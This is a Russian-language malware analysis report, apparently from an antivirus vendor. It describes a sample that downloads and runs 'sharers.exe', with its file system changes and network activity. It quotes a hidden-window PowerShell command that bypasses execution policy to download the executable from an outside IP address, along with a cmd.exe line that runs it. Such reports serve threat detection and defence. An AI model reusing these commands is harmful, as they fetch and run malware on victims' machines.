Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://11#.#0.146.148/sharers.exe как %appdata%\sharers.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\Sharers.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\drdtfhgygeghd{В .sct
- %APPDATA%\sharers.exe
- %TEMP%\wolfless\ballepresserne\mispatch188\smrskeens\basidigitalia\barrers\adjudanturers.ned
- %TEMP%\wolfless\ballepresserne\parimutuels\document-open-symbolic.symbolic.png
- %TEMP%\wolfless\ballepresserne\parimutuels\nringsmaterialers.eun
- %TEMP%\nsffd52.tmp\system.dll
Удаляет следующие файлы
- %TEMP%\drdtfhgygeghd{В .sct
Сетевая активность
Подключается к
- '11#.#0.146.148':80
TCP
Запросы HTTP GET
- http://11#.#0.146.148/Sharers.exe
Другое
Создает и запускает на исполнение
- '%APPDATA%\sharers.exe'
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\Sharers.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://11#.#0.146.148/Sharers.exe','%APPDATA%\Sharers.exe')' (со скрытым окном)
